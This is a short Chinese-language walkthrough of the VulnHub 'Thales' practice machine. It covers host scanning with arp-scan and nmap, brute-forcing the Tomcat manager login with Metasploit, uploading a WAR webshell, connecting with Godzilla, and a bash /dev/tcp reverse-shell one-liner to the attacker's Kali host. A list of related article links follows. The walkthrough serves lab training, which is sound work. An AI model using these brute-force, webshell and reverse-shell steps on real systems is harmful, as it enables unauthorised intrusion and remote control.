Thales靶机在网络安全教学与实战中的应用与价值

1.下载好该靶机,将桥接模式改为NET网段并启动

https://download.vulnhub.com/thales/Thales.zip

2.借助kali来确定该靶机的IP

复制代码
arp-scan -l
nmap -O 192.168.56.101

3.访问改IP 192.168.56.101

4.点击manager app发现有个登录

使用msf爆破一下

复制代码
msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS 192.168.56.101
run

5.然后进行登录tomcat:role1,在这上传一个war包

6.然后访问这个包

7.用哥斯拉去进行连接

8.然后进行反弹shell

在kali进行监听

在终端运行

复制代码
bash -c 'bash -i>& /dev/tcp/192.168.56.102/8888 0>&1'

回到kali发现监听到

相关推荐
用户962377954482 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机5 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机5 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954486 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star7 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544810 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透5 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全